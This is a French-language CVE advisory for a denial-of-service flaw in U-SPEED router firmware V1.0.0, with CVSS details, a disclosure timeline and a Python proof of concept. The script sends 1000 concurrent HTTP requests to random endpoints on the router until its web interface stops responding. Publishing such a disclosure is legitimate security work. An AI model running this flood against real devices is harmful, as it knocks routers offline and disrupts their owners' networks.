
Preuve de concept pour CVE-2026-36958, une vulnérabilité de déni de service dans le firmware du routeur U-SPEED qui épuise les ressources via des requêtes HTTP concurrentes, rendant l'interface web non réactive.
ID CVE : CVE-2026-36958 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : U-SPEED Produit : Routeur U-SPEED Version du firmware : V1.0.0 CWE : CWE-400 - Consommation de ressources incontrôlée
Le firmware V1.0.0 du routeur U-SPEED est vulnérable à un déni de service. En envoyant un grand nombre de requêtes HTTP concurrentes vers des points de terminaison aléatoires ou inexistants de l'interface de gestion web, un attaquant peut épuiser les ressources système du serveur HTTP Boa intégré. Cela rend l'interface web du routeur non réactive et peut nécessiter un redémarrage manuel pour rétablir un fonctionnement normal.
Score CVSS v3.1 : 7,5 (Élevé)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrique | Valeur |
|---|
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction de l'utilisateur | Aucune |
| Impact sur la confidentialité | Aucun |
| Impact sur l'intégrité | Aucun |
| Impact sur la disponibilité | Élevé |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Comportement attendu : Le serveur doit gérer les connexions concurrentes avec élégance. Comportement réel : L'interface web devient non réactive ; un redémarrage manuel est nécessaire.
| Date | Événement |
|---|---|
| 2026-04-29 | Vulnérabilité découverte |
| 2026-04-29 | Signalée à MITRE |
| 2026-04-29 | CVE-2026-36958 attribuée |
| 2026-04-29 | Divulgation publique |